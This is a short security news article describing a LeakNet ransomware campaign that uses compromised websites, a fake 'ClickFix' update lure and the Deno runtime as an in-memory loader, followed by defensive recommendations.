A sophisticated new ransomware campaign attributed to the LeakNet group is leveraging a multi-stage infection chain that begins with compromised legitimate websites. Security researchers have identified a novel attack vector where victims are redirected to malicious sites hosting a fake software update utility called "ClickFix." This social engineering lure prompts users to download and execute a malicious package, which is the critical first step in the attack. The campaign demonstrates a significant evolution in initial access techniques, moving away from reliance on phishing emails to the exploitation of trusted web domains, thereby increasing the likelihood of user compliance and bypassing traditional email security filters.
Upon execution, the ClickFix package initiates a complex deployment sequence designed to evade detection. The core of this sequence is the use of Deno, a secure runtime for JavaScript and TypeScript typically used by developers, as an in-memory loader for the final ransomware payload. By utilizing Deno's legitimate functionality to fetch and execute remote scripts, the attackers can run malicious code directly in system memory without writing a persistent file to disk. This fileless execution technique presents a substantial challenge for conventional antivirus solutions that rely on file signature scanning, allowing the malware to operate stealthily within the victim's environment.
The final payload delivered by this in-memory loader is identified as LeakNet ransomware. This malware conducts typical ransomware operations, including file encryption and the exfiltration of sensitive data, aligning with the double-extortion tactic now commonplace among ransomware gangs. The attackers threaten to publish stolen data on leak sites unless a ransom is paid. The use of a legitimate tool like Deno as an attack component underscores a growing trend in cybercrime: the "living-off-the-land" (LotL) strategy, where attackers abuse trusted, pre-installed software or common development tools to blend malicious activity with normal system operations, further complicating detection and forensic analysis.
Organizations are urged to enhance their defensive postures against such advanced threats. Key recommendations include implementing robust web filtering to block access to known malicious and newly compromised domains, educating users on the dangers of downloading unsolicited software—even from seemingly legitimate websites—and deploying endpoint detection and response (EDR) solutions capable of monitoring for suspicious in-memory activities and process behaviors. This campaign serves as a stark reminder that the threat landscape is continuously evolving, with adversaries innovating their methods to exploit both technological gaps and human trust.
